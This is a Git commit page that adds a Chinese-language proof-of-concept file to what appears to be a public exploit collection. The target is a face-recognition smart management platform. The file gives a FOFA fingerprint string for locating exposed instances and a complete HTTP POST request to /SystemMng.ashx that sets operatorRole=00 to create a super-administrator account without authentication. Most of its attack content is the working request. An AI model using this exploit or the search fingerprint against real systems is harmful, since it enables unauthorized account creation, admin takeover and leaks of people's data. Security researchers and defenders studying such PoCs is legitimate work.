mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 脸爱云 一脸通智慧管理平台任意用户添加漏洞.md
This commit is contained in:
parent
18d097adfd
commit
db7cc76939
30
脸爱云 一脸通智慧管理平台任意用户添加漏洞.md
Normal file
30
脸爱云 一脸通智慧管理平台任意用户添加漏洞.md
Normal file
@ -0,0 +1,30 @@
|
||||
## 脸爱云 一脸通智慧管理平台任意用户添加漏洞
|
||||
|
||||
脸爱云一脸通智慧管理平台是一套功能强大,运行稳定、操作简单方便、用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。该管理平台/SystemMng.ashx接口处存在权限绕过漏洞,可通过输入00操纵参数operatorRole,导致特权管理不当,未经身份认证攻击者可以通过此漏洞创建超级管理员账户,造成信息泄露和后台接管。
|
||||
|
||||
|
||||
## fofa
|
||||
```
|
||||
"欢迎使用脸爱云 一脸通智慧管理平台"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /SystemMng.ashx HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://127.0.0.1/top.html
|
||||
Connection: close
|
||||
Cookie: ASP.NET_SessionId=whnrkuaqbz0lyv1fbwtzf23y
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 175
|
||||
|
||||
operatorName=test1&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
|
||||
```
|
||||

|
||||
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user